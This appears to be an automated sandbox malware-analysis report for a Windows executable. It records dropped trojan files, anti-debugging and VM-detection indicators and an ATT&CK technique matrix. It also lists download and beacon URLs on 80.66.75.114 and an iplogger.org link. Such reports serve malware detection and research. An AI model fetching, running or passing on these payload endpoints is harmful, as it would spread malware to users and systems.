Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeAPI coverage: 9.7 %
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041E42D FindFirstFileExW,0_2_0041E42D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067E694 FindFirstFileExW,0_2_0067E694
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: nRGKqzVQRt.exe, 00000000.00000002.2604107405.0000000000838000.00000004.00000020.00020000.00000000.sdmp, nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: nRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3@y
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402940
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041B919 mov eax, dword ptr fs:[00000030h]0_2_0041B919
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00414C8F mov eax, dword ptr fs:[00000030h]0_2_00414C8F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066092B mov eax, dword ptr fs:[00000030h]0_2_0066092B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0067BB80 mov eax, dword ptr fs:[00000030h]0_2_0067BB80
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00660D90 mov eax, dword ptr fs:[00000030h]0_2_00660D90
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00674EF6 mov eax, dword ptr fs:[00000030h]0_2_00674EF6
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_007743DE push dword ptr fs:[00000030h]0_2_007743DE
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_00402C60 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C60
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040D949 SetUnhandledExceptionFilter,0_2_0040D949
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040CD96 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD96
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040D7B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D7B5
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066DA1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0066DA1C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_006713E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006713E2
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066DBB0 SetUnhandledExceptionFilter,0_2_0066DBB0
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0066CFFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0066CFFD
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040D9B3 cpuid 0_2_0040D9B3
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00421135
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00421180
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_0042121B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004212A6
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00419BF4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_004214F9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0042161F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420E93
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00421725
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_0041972F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004217F4
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,0_2_004451E9
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0044C269
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00446333
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_00442624
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_00446F8F
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_006810FA
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00681886
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_0068198C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00679996
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00681A5B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_006813E7
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_0068139C
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: EnumSystemLocalesW,0_2_00681482
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0068150D
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00679E5B
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: GetLocaleInfoW,0_2_00681760
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeCode function: 0_2_0040DBE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040DBE5
Source: C:\Users\user\Desktop\nRGKqzVQRt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory151
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
Software Packing		Cached Domain Credentials33
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528608 Sample: nRGKqzVQRt.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 44 Multi AV Scanner detection for domain / URL 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 50 5 other signatures 2->50 6 nRGKqzVQRt.exe 34 2->6         started        process3 dnsIp4 42 80.66.75.114, 49738, 80 RISS-ASRU Russian Federation 6->42 20 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 6->20 dropped 22 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 6->22 dropped 24 C:\Users\user\AppData\Local\...\dll[1], PE32 6->24 dropped 26 C:\Users\user\AppData\Local\...\soft[1], PE32 6->26 dropped 52 Detected unpacking (changes PE section rights) 6->52 54 Detected unpacking (overwrites its own PE header) 6->54 11 WerFault.exe 16 6->11         started        14 WerFault.exe 3 16 6->14         started        16 WerFault.exe 19 16 6->16         started        18 5 other processes 6->18 file5 signatures6 process7 file8 28 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->28 dropped 30 C:\ProgramData\Microsoft\...\Report.wer, Unicode 14->30 dropped 32 C:\ProgramData\Microsoft\...\Report.wer, Unicode 16->32 dropped 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->34 dropped 36 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->36 dropped 38 C:\ProgramData\Microsoft\...\Report.wer, Unicode 18->38 dropped 40 2 other malicious files 18->40 dropped

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
nRGKqzVQRt.exe32%VirustotalBrowse
nRGKqzVQRt.exe100%AviraHEUR/AGEN.1306956
nRGKqzVQRt.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]60%VirustotalBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe60%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
http://80.66.75.114/dll/downloadG9%VirustotalBrowse
http://80.66.75.114/dll/download19%VirustotalBrowse
http://80.66.75.114/dll/key19%VirustotalBrowse
http://80.66.75.114/dll/downloadC17%VirustotalBrowse
http://80.66.75.114/files/download20%VirustotalBrowse
https://iplogger.org/1Pz8p71%VirustotalBrowse
http://80.66.75.114/name20%VirustotalBrowse
http://80.66.75.114/soft/download19%VirustotalBrowse
http://80.66.75.114/soft/download?16%VirustotalBrowse
https://g-cleanit.hk1%VirustotalBrowse
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB19%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://80.66.75.114/dll/keyfalseunknown
http://80.66.75.114/files/downloadfalseunknown
http://80.66.75.114/dll/downloadfalseunknown
http://80.66.75.114/soft/downloadfalseunknown
http://80.66.75.114/namefalseunknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://80.66.75.114/dll/downloadGnRGKqzVQRt.exe, 00000000.00000002.2604414561.0000000002B70000.00000004.00000020.00020000.00000000.sdmpfalseunknown
